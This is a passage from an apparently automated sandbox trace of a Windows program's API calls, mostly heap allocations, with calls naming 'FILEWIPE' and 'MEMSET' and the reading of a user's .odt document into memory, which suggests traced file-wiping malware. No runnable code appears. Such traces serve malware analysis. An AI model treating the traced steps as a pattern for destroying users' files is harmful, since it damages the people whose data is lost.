wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 1 [0172.872] TranslateMessage (lpMsg=0x87f36c) returned 0 [0172.872] DispatchMessageW (lpMsg=0x87f36c) returned 0x0 [0172.872] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ea08) returned 1 [0172.873] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0172.873] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0172.873] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0172.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0172.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0172.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0172.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0172.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0172.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0172.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0172.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0172.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0172.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0172.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0172.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0172.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0172.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0172.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0172.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0172.878] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0172.878] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0172.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0172.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0172.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0172.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0172.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0172.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0172.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5b8 [0172.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0172.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0172.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0172.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0172.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0172.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0172.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0172.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0172.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0172.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0172.885] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0172.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0172.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0172.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0172.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0172.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0172.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0172.885] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\p_2chhlm.odt")) returned 0x20 [0172.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0172.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0172.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0172.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.886] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0172.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0172.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0172.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0172.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0172.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.886] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0734080, ftCreationTime.dwHighDateTime=0x1d5e226, ftLastAccessTime.dwLowDateTime=0x8494bac0, ftLastAccessTime.dwHighDateTime=0x1d5e4b9, ftLastWriteTime.dwLowDateTime=0x8494bac0, ftLastWriteTime.dwHighDateTime=0x1d5e4b9, nFileSizeHigh=0x0, nFileSizeLow=0x118f8, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="P_2cHhLM.odt", cAlternateFileName="")) returned 0x90af58 [0172.886] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0172.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0172.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0172.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0172.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0172.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0172.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0172.887] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0172.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0172.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0172.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0172.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0172.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0172.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0172.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0172.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0172.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0172.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0172.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0172.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0172.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0172.890] CharLowerBuffW (in: lpsz="byte[71928]", cchLength=0xb | out: lpsz="byte[71928]") returned 0xb [0172.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0172.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0172.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0172.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0172.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0172.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x118f8) returned 0xa5f008 [0172.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0172.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0172.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0172.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0172.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0172.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0172.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0172.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0172.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0172.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0172.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0172.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0172.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0172.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0172.892] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0172.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.893] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0172.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0172.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0172.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0172.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0172.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0172.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0172.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0172.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 